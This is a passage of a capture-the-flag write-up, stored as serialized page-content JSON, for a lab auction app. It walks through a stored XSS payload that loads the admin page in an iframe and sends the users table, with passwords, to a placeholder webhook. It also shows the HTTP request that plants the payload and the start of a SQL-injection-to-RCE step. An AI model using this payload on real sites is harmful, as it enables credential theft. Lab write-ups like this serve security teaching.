style":338},[2477],{"type":39,"value":449},{"type":34,"tag":315,"props":2479,"children":2480},{"style":1463},[2481],{"type":39,"value":2482}," 800",{"type":34,"tag":315,"props":2484,"children":2485},{"style":338},[2486],{"type":39,"value":468},{"type":34,"tag":315,"props":2488,"children":2489},{"class":317,"line":471},[2490,2494,2498,2503,2507,2512],{"type":34,"tag":315,"props":2491,"children":2492},{"style":332},[2493],{"type":39,"value":2412},{"type":34,"tag":315,"props":2495,"children":2496},{"style":338},[2497],{"type":39,"value":66},{"type":34,"tag":315,"props":2499,"children":2500},{"style":332},[2501],{"type":39,"value":2502},"height",{"type":34,"tag":315,"props":2504,"children":2505},{"style":338},[2506],{"type":39,"value":449},{"type":34,"tag":315,"props":2508,"children":2509},{"style":1463},[2510],{"type":39,"value":2511}," 600",{"type":34,"tag":315,"props":2513,"children":2514},{"style":338},[2515],{"type":39,"value":468},{"type":34,"tag":315,"props":2517,"children":2518},{"class":317,"line":485},[2519,2524,2528,2532,2536,2541,2545,2549],{"type":34,"tag":315,"props":2520,"children":2521},{"style":332},[2522],{"type":39,"value":2523},"document",{"type":34,"tag":315,"props":2525,"children":2526},{"style":338},[2527],{"type":39,"value":66},{"type":34,"tag":315,"props":2529,"children":2530},{"style":332},[2531],{"type":39,"value":463},{"type":34,"tag":315,"props":2533,"children":2534},{"style":338},[2535],{"type":39,"value":66},{"type":34,"tag":315,"props":2537,"children":2538},{"style":343},[2539],{"type":39,"value":2540},"appendChild",{"type":34,"tag":315,"props":2542,"children":2543},{"style":338},[2544],{"type":39,"value":351},{"type":34,"tag":315,"props":2546,"children":2547},{"style":332},[2548],{"type":39,"value":2412},{"type":34,"tag":315,"props":2550,"children":2551},{"style":338},[2552],{"type":39,"value":616},{"type":34,"tag":48,"props":2554,"children":2555},{},[2556],{"type":39,"value":2557},"Result:",{"type":34,"tag":73,"props":2559,"children":2561},{"imgSrc":2560},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104159/writeups/aurors-archive/iframe_first_step.webp",[],{"type":34,"tag":48,"props":2563,"children":2564},{},[2565],{"type":39,"value":2566},"We will now click on the last element of the list which is the users table:",{"type":34,"tag":301,"props":2568,"children":2569},{"lang":303},[2570],{"type":34,"tag":306,"props":2571,"children":2573},{"className":308,"code":2572,"language":303,"meta":7,"style":7},"document.querySelector('iframe').contentWindow.document.querySelectorAll('li').at(-1).click()\n",[2574],{"type":34,"tag":59,"props":2575,"children":2576},{"__ignoreMap":7},[2577],{"type":34,"tag":315,"props":2578,"children":2579},{"class":317,"line":318},[2580,2584,2588,2593,2597,2601,2605,2609,2613,2618,2622,2626,2630,2635,2639,2643,2647,2651,2655,2660,2664,2669,2673,2677,2682],{"type":34,"tag":315,"props":2581,"children":2582},{"style":332},[2583],{"type":39,"value":2523},{"type":34,"tag":315,"props":2585,"children":2586},{"style":338},[2587],{"type":39,"value":66},{"type":34,"tag":315,"props":2589,"children":2590},{"style":343},[2591],{"type":39,"value":2592},"querySelector",{"type":34,"tag":315,"props":2594,"children":2595},{"style":338},[2596],{"type":39,"value":351},{"type":34,"tag":315,"props":2598,"children":2599},{"style":354},[2600],{"type":39,"value":852},{"type":34,"tag":315,"props":2602,"children":2603},{"style":360},[2604],{"type":39,"value":2412},{"type":34,"tag":315,"props":2606,"children":2607},{"style":354},[2608],{"type":39,"value":852},{"type":34,"tag":315,"props":2610,"children":2611},{"style":338},[2612],{"type":39,"value":1514},{"type":34,"tag":315,"props":2614,"children":2615},{"style":332},[2616],{"type":39,"value":2617},"contentWindow",{"type":34,"tag":315,"props":2619,"children":2620},{"style":338},[2621],{"type":39,"value":66},{"type":34,"tag":315,"props":2623,"children":2624},{"style":332},[2625],{"type":39,"value":2523},{"type":34,"tag":315,"props":2627,"children":2628},{"style":338},[2629],{"type":39,"value":66},{"type":34,"tag":315,"props":2631,"children":2632},{"style":343},[2633],{"type":39,"value":2634},"querySelectorAll",{"type":34,"tag":315,"props":2636,"children":2637},{"style":338},[2638],{"type":39,"value":351},{"type":34,"tag":315,"props":2640,"children":2641},{"style":354},[2642],{"type":39,"value":852},{"type":34,"tag":315,"props":2644,"children":2645},{"style":360},[2646],{"type":39,"value":83},{"type":34,"tag":315,"props":2648,"children":2649},{"style":354},[2650],{"type":39,"value":852},{"type":34,"tag":315,"props":2652,"children":2653},{"style":338},[2654],{"type":39,"value":1514},{"type":34,"tag":315,"props":2656,"children":2657},{"style":343},[2658],{"type":39,"value":2659},"at",{"type":34,"tag":315,"props":2661,"children":2662},{"style":338},[2663],{"type":39,"value":351},{"type":34,"tag":315,"props":2665,"children":2666},{"style":384},[2667],{"type":39,"value":2668},"-",{"type":34,"tag":315,"props":2670,"children":2671},{"style":1463},[2672],{"type":39,"value":2105},{"type":34,"tag":315,"props":2674,"children":2675},{"style":338},[2676],{"type":39,"value":1514},{"type":34,"tag":315,"props":2678,"children":2679},{"style":343},[2680],{"type":39,"value":2681},"click",{"type":34,"tag":315,"props":2683,"children":2684},{"style":338},[2685],{"type":39,"value":2686},"()\n",{"type":34,"tag":48,"props":2688,"children":2689},{},[2690],{"type":39,"value":2557},{"type":34,"tag":73,"props":2692,"children":2694},{"imgSrc":2693},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104209/writeups/aurors-archive/display_user_table.webp",[],{"type":34,"tag":48,"props":2696,"children":2697},{},[2698],{"type":39,"value":2699},"We can now retrieve the table with the following line:",{"type":34,"tag":301,"props":2701,"children":2702},{"lang":303},[2703],{"type":34,"tag":306,"props":2704,"children":2706},{"className":308,"code":2705,"language":303,"meta":7,"style":7},">> document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML\n\"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>\" \n",[2707],{"type":34,"tag":59,"props":2708,"children":2709},{"__ignoreMap":7},[2710,2804],{"type":34,"tag":315,"props":2711,"children":2712},{"class":317,"line":318},[2713,2718,2722,2726,2730,2734,2738,2742,2746,2750,2754,2758,2762,2766,2770,2774,2778,2782,2786,2791,2795,2799],{"type":34,"tag":315,"props":2714,"children":2715},{"style":384},[2716],{"type":39,"value":2717},">>",{"type":34,"tag":315,"props":2719,"children":2720},{"style":332},[2721],{"type":39,"value":2390},{"type":34,"tag":315,"props":2723,"children":2724},{"style":338},[2725],{"type":39,"value":66},{"type":34,"tag":315,"props":2727,"children":2728},{"style":343},[2729],{"type":39,"value":2592},{"type":34,"tag":315,"props":2731,"children":2732},{"style":338},[2733],{"type":39,"value":351},{"type":34,"tag":315,"props":2735,"children":2736},{"style":354},[2737],{"type":39,"value":852},{"type":34,"tag":315,"props":2739,"children":2740},{"style":360},[2741],{"type":39,"value":2412},{"type":34,"tag":315,"props":2743,"children":2744},{"style":354},[2745],{"type":39,"value":852},{"type":34,"tag":315,"props":2747,"children":2748},{"style":338},[2749],{"type":39,"value":1514},{"type":34,"tag":315,"props":2751,"children":2752},{"style":332},[2753],{"type":39,"value":2617},{"type":34,"tag":315,"props":2755,"children":2756},{"style":338},[2757],{"type":39,"value":66},{"type":34,"tag":315,"props":2759,"children":2760},{"style":332},[2761],{"type":39,"value":2523},{"type":34,"tag":315,"props":2763,"children":2764},{"style":338},[2765],{"type":39,"value":66},{"type":34,"tag":315,"props":2767,"children":2768},{"style":332},[2769],{"type":39,"value":463},{"type":34,"tag":315,"props":2771,"children":2772},{"style":338},[2773],{"type":39,"value":66},{"type":34,"tag":315,"props":2775,"children":2776},{"style":343},[2777],{"type":39,"value":2592},{"type":34,"tag":315,"props":2779,"children":2780},{"style":338},[2781],{"type":39,"value":351},{"type":34,"tag":315,"props":2783,"children":2784},{"style":354},[2785],{"type":39,"value":852},{"type":34,"tag":315,"props":2787,"children":2788},{"style":360},[2789],{"type":39,"value":2790},"table",{"type":34,"tag":315,"props":2792,"children":2793},{"style":354},[2794],{"type":39,"value":852},{"type":34,"tag":315,"props":2796,"children":2797},{"style":338},[2798],{"type":39,"value":1514},{"type":34,"tag":315,"props":2800,"children":2801},{"style":332},[2802],{"type":39,"value":2803},"innerHTML\n",{"type":34,"tag":315,"props":2805,"children":2806},{"class":317,"line":328},[2807,2811,2816],{"type":34,"tag":315,"props":2808,"children":2809},{"style":354},[2810],{"type":39,"value":357},{"type":34,"tag":315,"props":2812,"children":2813},{"style":360},[2814],{"type":39,"value":2815},"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>",{"type":34,"tag":315,"props":2817,"children":2818},{"style":354},[2819],{"type":39,"value":2820},"\"\n",{"type":34,"tag":48,"props":2822,"children":2823},{},[2824],{"type":39,"value":2825},"After that, we can send it to our webhook. Below is the final payload - timeouts have been added to allow time for the data to be displayed:",{"type":34,"tag":301,"props":2827,"children":2828},{"lang":303},[2829],{"type":34,"tag":306,"props":2830,"children":2832},{"className":308,"code":2831,"language":303,"meta":7,"style":7},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\ndocument.body.appendChild(iframe);\nsetTimeout(() => {\n  document.querySelector('iframe').contentWindow.document.querySelectorAll('li')[3].click()\n  setTimeout(() => {\n    window.location = '//\u003CWEBHOOK>/?userstable=' + btoa(document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML)\n  }, 1000);\n}, 1000);\n",[2833],{"type":34,"tag":59,"props":2834,"children":2835},{"__ignoreMap":7},[2836,2883,2918,2953,2974,3069,3089,3227,3244],{"type":34,"tag":315,"props":2837,"children":2838},{"class":317,"line":318},[2839,2843,2847,2851,2855,2859,2863,2867,2871,2875,2879],{"type":34,"tag":315,"props":2840,"children":2841},{"style":384},[2842],{"type":39,"value":2376},{"type":34,"tag":315,"props":2844,"children":2845},{"style":332},[2846],{"type":39,"value":2381},{"type":34,"tag":315,"props":2848,"children":2849},{"style":338},[2850],{"type":39,"value":449},{"type":34,"tag":315,"props":2852,"children":2853},{"style":332},[2854],{"type":39,"value":2390},{"type":34,"tag":315,"props":2856,"children":2857},{"style":338},[2858],{"type":39,"value":66},{"type":34,"tag":315,"props":2860,"children":2861},{"style":343},[2862],{"type":39,"value":2399},{"type":34,"tag":315,"props":2864,"children":2865},{"style":338},[2866],{"type":39,"value":351},{"type":34,"tag":315,"props":2868,"children":2869},{"style":354},[2870],{"type":39,"value":357},{"type":34,"tag":315,"props":2872,"children":2873},{"style":360},[2874],{"type":39,"value":2412},{"type":34,"tag":315,"props":2876,"children":2877},{"style":354},[2878],{"type":39,"value":357},{"type":34,"tag":315,"props":2880,"children":2881},{"style":338},[2882],{"type":39,"value":616},{"type":34,"tag":315,"props":2884,"children":2885},{"class":317,"line":328},[2886,2890,2894,2898,2902,2906,2910,2914],{"type":34,"tag":315,"props":2887,"children":2888},{"style":332},[2889],{"type":39,"value":2412},{"type":34,"tag":315,"props":2891,"children":2892},{"style":338},[2893],{"type":39,"value":66},{"type":34,"tag":315,"props":2895,"children":2896},{"style":332},[2897],{"type":39,"value":2436},{"type":34,"tag":315,"props":2899,"children":2900},{"style":338},[2901],{"type":39,"value":449},{"type":34,"tag":315,"props":2903,"children":2904},{"style":354},[2905],{"type":39,"value":505},{"type":34,"tag":315,"props":2907,"children":2908},{"style":360},[2909],{"type":39,"value":2449},{"type":34,"tag":315,"props":2911,"children":2912},{"style":354},[2913],{"type":39,"value":534},{"type":34,"tag":315,"props":2915,"children":2916},{"style":338},[2917],{"type":39,"value":468},{"type":34,"tag":315,"props":2919,"children":2920},{"class":317,"line":423},[2921,2925,2929,2933,2937,2941,2945,2949],{"type":34,"tag":315,"props":2922,"children":2923},{"style":332},[2924],{"type":39,"value":2523},{"type":34,"tag":315,"props":2926,"children":2927},{"style":338},[2928],{"type":39,"value":66},{"type":34,"tag":315,"props":2930,"children":2931},{"style":332},[2932],{"type":39,"value":463},{"type":34,"tag":315,"props":2934,"children":2935},{"style":338},[2936],{"type":39,"value":66},{"type":34,"tag":315,"props":2938,"children":2939},{"style":343},[2940],{"type":39,"value":2540},{"type":34,"tag":315,"props":2942,"children":2943},{"style":338},[2944],{"type":39,"value":351},{"type":34,"tag":315,"props":2946,"children":2947},{"style":332},[2948],{"type":39,"value":2412},{"type":34,"tag":315,"props":2950,"children":2951},{"style":338},[2952],{"type":39,"value":616},{"type":34,"tag":315,"props":2954,"children":2955},{"class":317,"line":471},[2956,2961,2966,2970],{"type":34,"tag":315,"props":2957,"children":2958},{"style":343},[2959],{"type":39,"value":2960},"setTimeout",{"type":34,"tag":315,"props":2962,"children":2963},{"style":338},[2964],{"type":39,"value":2965},"(()",{"type":34,"tag":315,"props":2967,"children":2968},{"style":338},[2969],{"type":39,"value":415},{"type":34,"tag":315,"props":2971,"children":2972},{"style":338},[2973],{"type":39,"value":420},{"type":34,"tag":315,"props":2975,"children":2976},{"class":317,"line":485},[2977,2982,2986,2990,2994,2998,3002,3006,3010,3014,3018,3022,3026,3030,3034,3038,3042,3046,3051,3056,3061,3065],{"type":34,"tag":315,"props":2978,"children":2979},{"style":332},[2980],{"type":39,"value":2981},"  document",{"type":34,"tag":315,"props":2983,"children":2984},{"style":338},[2985],{"type":39,"value":66},{"type":34,"tag":315,"props":2987,"children":2988},{"style":343},[2989],{"type":39,"value":2592},{"type":34,"tag":315,"props":2991,"children":2992},{"style":338},[2993],{"type":39,"value":351},{"type":34,"tag":315,"props":2995,"children":2996},{"style":354},[2997],{"type":39,"value":852},{"type":34,"tag":315,"props":2999,"children":3000},{"style":360},[3001],{"type":39,"value":2412},{"type":34,"tag":315,"props":3003,"children":3004},{"style":354},[3005],{"type":39,"value":852},{"type":34,"tag":315,"props":3007,"children":3008},{"style":338},[3009],{"type":39,"value":1514},{"type":34,"tag":315,"props":3011,"children":3012},{"style":332},[3013],{"type":39,"value":2617},{"type":34,"tag":315,"props":3015,"children":3016},{"style":338},[3017],{"type":39,"value":66},{"type":34,"tag":315,"props":3019,"children":3020},{"style":332},[3021],{"type":39,"value":2523},{"type":34,"tag":315,"props":3023,"children":3024},{"style":338},[3025],{"type":39,"value":66},{"type":34,"tag":315,"props":3027,"children":3028},{"style":343},[3029],{"type":39,"value":2634},{"type":34,"tag":315,"props":3031,"children":3032},{"style":338},[3033],{"type":39,"value":351},{"type":34,"tag":315,"props":3035,"children":3036},{"style":354},[3037],{"type":39,"value":852},{"type":34,"tag":315,"props":3039,"children":3040},{"style":360},[3041],{"type":39,"value":83},{"type":34,"tag":315,"props":3043,"children":3044},{"style":354},[3045],{"type":39,"value":852},{"type":34,"tag":315,"props":3047,"children":3048},{"style":338},[3049],{"type":39,"value":3050},")[",{"type":34,"tag":315,"props":3052,"children":3053},{"style":1463},[3054],{"type":39,"value":3055},"3",{"type":34,"tag":315,"props":3057,"children":3058},{"style":338},[3059],{"type":39,"value":3060},"].",{"type":34,"tag":315,"props":3062,"children":3063},{"style":343},[3064],{"type":39,"value":2681},{"type":34,"tag":315,"props":3066,"children":3067},{"style":338},[3068],{"type":39,"value":2686},{"type":34,"tag":315,"props":3070,"children":3071},{"class":317,"line":541},[3072,3077,3081,3085],{"type":34,"tag":315,"props":3073,"children":3074},{"style":343},[3075],{"type":39,"value":3076},"  setTimeout",{"type":34,"tag":315,"props":3078,"children":3079},{"style":338},[3080],{"type":39,"value":2965},{"type":34,"tag":315,"props":3082,"children":3083},{"style":338},[3084],{"type":39,"value":415},{"type":34,"tag":315,"props":3086,"children":3087},{"style":338},[3088],{"type":39,"value":420},{"type":34,"tag":315,"props":3090,"children":3091},{"class":317,"line":551},[3092,3097,3101,3106,3110,3114,3119,3123,3128,3133,3137,3141,3145,3149,3153,3157,3161,3165,3169,3173,3177,3181,3185,3189,3193,3197,3201,3205,3209,3213,3217,3222],{"type":34,"tag":315,"props":3093,"children":3094},{"style":332},[3095],{"type":39,"value":3096},"    window",{"type":34,"tag":315,"props":3098,"children":3099},{"style":338},[3100],{"type":39,"value":66},{"type":34,"tag":315,"props":3102,"children":3103},{"style":332},[3104],{"type":39,"value":3105},"location",{"type":34,"tag":315,"props":3107,"children":3108},{"style":338},[3109],{"type":39,"value":449},{"type":34,"tag":315,"props":3111,"children":3112},{"style":354},[3113],{"type":39,"value":1553},{"type":34,"tag":315,"props":3115,"children":3116},{"style":360},[3117],{"type":39,"value":3118},"//\u003CWEBHOOK>/?userstable=",{"type":34,"tag":315,"props":3120,"children":3121},{"style":354},[3122],{"type":39,"value":852},{"type":34,"tag":315,"props":3124,"children":3125},{"style":384},[3126],{"type":39,"value":3127}," +",{"type":34,"tag":315,"props":3129,"children":3130},{"style":343},[3131],{"type":39,"value":3132}," btoa",{"type":34,"tag":315,"props":3134,"children":3135},{"style":338},[3136],{"type":39,"value":351},{"type":34,"tag":315,"props":3138,"children":3139},{"style":332},[3140],{"type":39,"value":2523},{"type":34,"tag":315,"props":3142,"children":3143},{"style":338},[3144],{"type":39,"value":66},{"type":34,"tag":315,"props":3146,"children":3147},{"style":343},[3148],{"type":39,"value":2592},{"type":34,"tag":315,"props":3150,"children":3151},{"style":338},[3152],{"type":39,"value":351},{"type":34,"tag":315,"props":3154,"children":3155},{"style":354},[3156],{"type":39,"value":852},{"type":34,"tag":315,"props":3158,"children":3159},{"style":360},[3160],{"type":39,"value":2412},{"type":34,"tag":315,"props":3162,"children":3163},{"style":354},[3164],{"type":39,"value":852},{"type":34,"tag":315,"props":3166,"children":3167},{"style":338},[3168],{"type":39,"value":1514},{"type":34,"tag":315,"props":3170,"children":3171},{"style":332},[3172],{"type":39,"value":2617},{"type":34,"tag":315,"props":3174,"children":3175},{"style":338},[3176],{"type":39,"value":66},{"type":34,"tag":315,"props":3178,"children":3179},{"style":332},[3180],{"type":39,"value":2523},{"type":34,"tag":315,"props":3182,"children":3183},{"style":338},[3184],{"type":39,"value":66},{"type":34,"tag":315,"props":3186,"children":3187},{"style":332},[3188],{"type":39,"value":463},{"type":34,"tag":315,"props":3190,"children":3191},{"style":338},[3192],{"type":39,"value":66},{"type":34,"tag":315,"props":3194,"children":3195},{"style":343},[3196],{"type":39,"value":2592},{"type":34,"tag":315,"props":3198,"children":3199},{"style":338},[3200],{"type":39,"value":351},{"type":34,"tag":315,"props":3202,"children":3203},{"style":354},[3204],{"type":39,"value":852},{"type":34,"tag":315,"props":3206,"children":3207},{"style":360},[3208],{"type":39,"value":2790},{"type":34,"tag":315,"props":3210,"children":3211},{"style":354},[3212],{"type":39,"value":852},{"type":34,"tag":315,"props":3214,"children":3215},{"style":338},[3216],{"type":39,"value":1514},{"type":34,"tag":315,"props":3218,"children":3219},{"style":332},[3220],{"type":39,"value":3221},"innerHTML",{"type":34,"tag":315,"props":3223,"children":3224},{"style":338},[3225],{"type":39,"value":3226},")\n",{"type":34,"tag":315,"props":3228,"children":3229},{"class":317,"line":570},[3230,3235,3240],{"type":34,"tag":315,"props":3231,"children":3232},{"style":338},[3233],{"type":39,"value":3234},"  },",{"type":34,"tag":315,"props":3236,"children":3237},{"style":1463},[3238],{"type":39,"value":3239}," 1000",{"type":34,"tag":315,"props":3241,"children":3242},{"style":338},[3243],{"type":39,"value":616},{"type":34,"tag":315,"props":3245,"children":3246},{"class":317,"line":578},[3247,3252,3256],{"type":34,"tag":315,"props":3248,"children":3249},{"style":338},[3250],{"type":39,"value":3251},"},",{"type":34,"tag":315,"props":3253,"children":3254},{"style":1463},[3255],{"type":39,"value":3239},{"type":34,"tag":315,"props":3257,"children":3258},{"style":338},[3259],{"type":39,"value":616},{"type":34,"tag":48,"props":3261,"children":3262},{},[3263],{"type":39,"value":3264},"To more easily trigger our payload, we will encode it in base64 and evaluate it using the eval function. We can then send it and add it to a bid like this:",{"type":34,"tag":301,"props":3266,"children":3267},{"lang":2159},[3268],{"type":34,"tag":306,"props":3269,"children":3271},{"className":2163,"code":3270,"language":2159,"meta":7,"style":7},"POST /api/auctions/2/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>\" }}\n",[3272],{"type":34,"tag":59,"props":3273,"children":3274},{"__ignoreMap":7},[3275,3299,3310,3321,3332,3343,3350],{"type":34,"tag":315,"props":3276,"children":3277},{"class":317,"line":318},[3278,3282,3287,3291,3295],{"type":34,"tag":315,"props":3279,"children":3280},{"style":475},[3281],{"type":39,"value":2176},{"type":34,"tag":315,"props":3283,"children":3284},{"style":701},[3285],{"type":39,"value":3286}," /api/auctions/2/bids ",{"type":34,"tag":315,"props":3288,"children":3289},{"style":475},[3290],{"type":39,"value":2186},{"type":34,"tag":315,"props":3292,"children":3293},{"style":701},[3294],{"type":39,"value":2191},{"type":34,"tag":315,"props":3296,"children":3297},{"style":1463},[3298],{"type":39,"value":2196},{"type":34,"tag":315,"props":3300,"children":3301},{"class":317,"line":328},[3302,3306],{"type":34,"tag":315,"props":3303,"children":3304},{"style":475},[3305],{"type":39,"value":2204},{"type":34,"tag":315,"props":3307,"children":3308},{"style":360},[3309],{"type":39,"value":2209},{"type":34,"tag":315,"props":3311,"children":3312},{"class":317,"line":423},[3313,3317],{"type":34,"tag":315,"props":3314,"children":3315},{"style":475},[3316],{"type":39,"value":2217},{"type":34,"tag":315,"props":3318,"children":3319},{"style":360},[3320],{"type":39,"value":2222},{"type":34,"tag":315,"props":3322,"children":3323},{"class":317,"line":471},[3324,3328],{"type":34,"tag":315,"props":3325,"children":3326},{"style":475},[3327],{"type":39,"value":2230},{"type":34,"tag":315,"props":3329,"children":3330},{"style":360},[3331],{"type":39,"value":2235},{"type":34,"tag":315,"props":3333,"children":3334},{"class":317,"line":485},[3335,3339],{"type":34,"tag":315,"props":3336,"children":3337},{"style":475},[3338],{"type":39,"value":2243},{"type":34,"tag":315,"props":3340,"children":3341},{"style":360},[3342],{"type":39,"value":2248},{"type":34,"tag":315,"props":3344,"children":3345},{"class":317,"line":541},[3346],{"type":34,"tag":315,"props":3347,"children":3348},{"emptyLinePlaceholder":545},[3349],{"type":39,"value":548},{"type":34,"tag":315,"props":3351,"children":3352},{"class":317,"line":551},[3353,3357,3361,3365,3369,3373,3377,3381,3385,3389,3393,3397,3401,3405,3409,3413,3417,3422,3426],{"type":34,"tag":315,"props":3354,"children":3355},{"style":338},[3356],{"type":39,"value":2066},{"type":34,"tag":315,"props":3358,"children":3359},{"style":2069},[3360],{"type":39,"value":357},{"type":34,"tag":315,"props":3362,"children":3363},{"style":642},[3364],{"type":39,"value":1446},{"type":34,"tag":315,"props":3366,"children":3367},{"style":2069},[3368],{"type":39,"value":357},{"type":34,"tag":315,"props":3370,"children":3371},{"style":338},[3372],{"type":39,"value":2084},{"type":34,"tag":315,"props":3374,"children":3375},{"style":2069},[3376],{"type":39,"value":357},{"type":34,"tag":315,"props":3378,"children":3379},{"style":642},[3380],{"type":39,"value":1455},{"type":34,"tag":315,"props":3382,"children":3383},{"style":2069},[3384],{"type":39,"value":357},{"type":34,"tag":315,"props":3386,"children":3387},{"style":338},[3388],{"type":39,"value":650},{"type":34,"tag":315,"props":3390,"children":3391},{"style":1463},[3392],{"type":39,"value":2105},{"type":34,"tag":315,"props":3394,"children":3395},{"style":338},[3396],{"type":39,"value":372},{"type":34,"tag":315,"props":3398,"children":3399},{"style":2069},[3400],{"type":39,"value":357},{"type":34,"tag":315,"props":3402,"children":3403},{"style":642},[3404],{"type":39,"value":2118},{"type":34,"tag":315,"props":3406,"children":3407},{"style":2069},[3408],{"type":39,"value":357},{"type":34,"tag":315,"props":3410,"children":3411},{"style":338},[3412],{"type":39,"value":650},{"type":34,"tag":315,"props":3414,"children":3415},{"style":354},[3416],{"type":39,"value":357},{"type":34,"tag":315,"props":3418,"children":3419},{"style":360},[3420],{"type":39,"value":3421},"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>",{"type":34,"tag":315,"props":3423,"children":3424},{"style":354},[3425],{"type":39,"value":357},{"type":34,"tag":315,"props":3427,"children":3428},{"style":338},[3429],{"type":39,"value":3430}," }}\n",{"type":34,"tag":48,"props":3432,"children":3433},{},[3434],{"type":39,"value":3435},"And finally call the bot on the page that has just been polluted with our XSS payload:",{"type":34,"tag":73,"props":3437,"children":3439},{"imgSrc":3438},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743110972/writeups/aurors-archive/send_to_bot.webp",[],{"type":34,"tag":48,"props":3441,"children":3442},{},[3443],{"type":39,"value":3444},"We can see that in our webhook we have received the passwords from the users table. We can now use the admin password to exploit the SQL injection.",{"type":34,"tag":73,"props":3446,"children":3449},{"imgSrc":3447,":width":3448},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743111675/writeups/aurors-archive/collab_get_passwords.webp","800",[],{"type":34,"tag":41,"props":3451,"children":3453},{"id":3452},"sql-injection-to-rce",[3454],{"type":39,"value":3455},"SQL Injection to RCE",{"type":34,"tag":48,"props":3457,"children":3458},{},[3459],{"type":39,"value":3460},"In the first part, we saw that in the administration section, there was an SQL injection. We also saw that the database is PostgreSQL 17, and we can see in the entrypoint that the user has superuser roles.",{"type":34,"tag":301,"props":3462,"children":3464},{"lang":3463},"bash",[3465],{"type":34,"tag":306,"props":3466,"children":3469},{"className":3467,"code":3468,"language":3463,"meta":7,"style":7},"language-bash shiki shiki-themes vitesse-dark","[..SNIP..]\n# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\necho \"[+] Setting up database and user...\"\nsu - postgres -c \"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\nDROP USER IF EXISTS appuser;\nCREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\nDROP DATABASE IF EXISTS appdb;\nCREATE DATABASE appdb OWNER appuser;\n\\c appdb\nGRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO appuser;\nGRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO appuser;\nEOF\"\n[..SNIP..]\n",[3470],{"type":34,"tag":59,"props":3471,"children":3472},{"__ignoreMap":7},[3473,3491,3499,3521,3554,3562,3570,3578,3586,3594,3602,3610,3618,3626,3638],{"type":34,"tag":315,"props":3474,"children":3475},{"class":317,"line":318},[3476,3481,3486],{"type":34,"tag":315,"props":3477,"children":3478},{"style":338},[3479],{"type":39,"value":3480},"[",{"type":34,"tag":315,"props":3482,"children":3483},{"style":701},[3484],{"type":39,"value":3485},"..SNIP..",{"type":34,"tag":315,"props":3487,"children":3488},{"style":338},[3489],{"type":39,"value":3490},"]\n",{"type":34,"tag":315,"props":3492,"children":3493},{"class":317,"line":328},[3494],{"type":34,"tag":315,"props":3495,"children":3496},{"style":322},[3497],{"type":39,"value":3498},"# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\n",{"type":34,"tag":315,"props":3500,"children":3501},{"class":317,"line":423},[3502,3507,3512,3517],{"type":34,"tag":315,"props":3503,"children":3504},{"style":642},[3505],{"type":39,"value":3506},"echo",{"type":34,"tag":315,"props":3508,"children":3509},{"style":354},[3510],{"type":39,"value":3511}," \"",{"type":34,"tag":315,"props":3513,"children":3514},{"style":360},[3515],{"type":39,"value":3516},"[+] Setting up database and user...",{"type":34,"tag":315,"props":3518,"children":3519},{"style":354},[3520],{"type":39,"value":2820},{"type":34,"tag":315,"props":3522,"children":3523},{"class":317,"line":471},[3524,3529,3534,3539,3545,3549],{"type":34,"tag":315,"props":3525,"children":3526},{"style":343},[3527],{"type":39,"value":3528},"su",{"type":34,"tag":315,"props":3530,"children":3531},{"style":360},[3532],{"type":39,"value":3533}," -",{"type":34,"tag":315,"props":3535,"children":3536},{"style":360},[3537],{"type":39,"value":3538}," postgres",{"type":34,"tag":315,"props":3540,"children":3542},{"style":3541},"--shiki-default:#C99076",[3543],{"type":39,"value":3544}," -c",{"type":34,"tag":315,"props":3546,"children":3547},{"style":354},[3548],{"type":39,"value":3511},{"type":34,"tag":315,"props":3550,"children":3551},{"style":360},[3552],{"type":39,"value":3553},"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\n",{"type":34,"tag":315,"props":3555,"children":3556},{"class":317,"line":485},[3557],{"type":34,"tag":315,"props":3558,"children":3559},{"style":360},[3560],{"type":39,"value":3561},"DROP USER IF EXISTS appuser;\n",{"type":34,"tag":315,"props":3563,"children":3564},{"class":317,"line":541},[3565],{"type":34,"tag":315,"props":3566,"children":3567},{"style":360},[3568],{"type":39,"value":3569},"CREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\n",{"type":34,"tag":315,"props":3571,"children":3572},{"class":317,"line":551},[3573],{"type":34,"tag":315,"props":3574,"children":3575},{"style":360},[3576],{"type":39,"value":3577},"DROP DATABASE IF EXISTS appdb;\n",{"type":34,"tag":315,"props":3579,"children":3580},{"class":317,"line":570},[3581],{"type":34,"tag":315,"props":3582,"children":3583},{"style":360},[3584],{"type":39,"value":3585},"CREATE DATABASE appdb OWNER 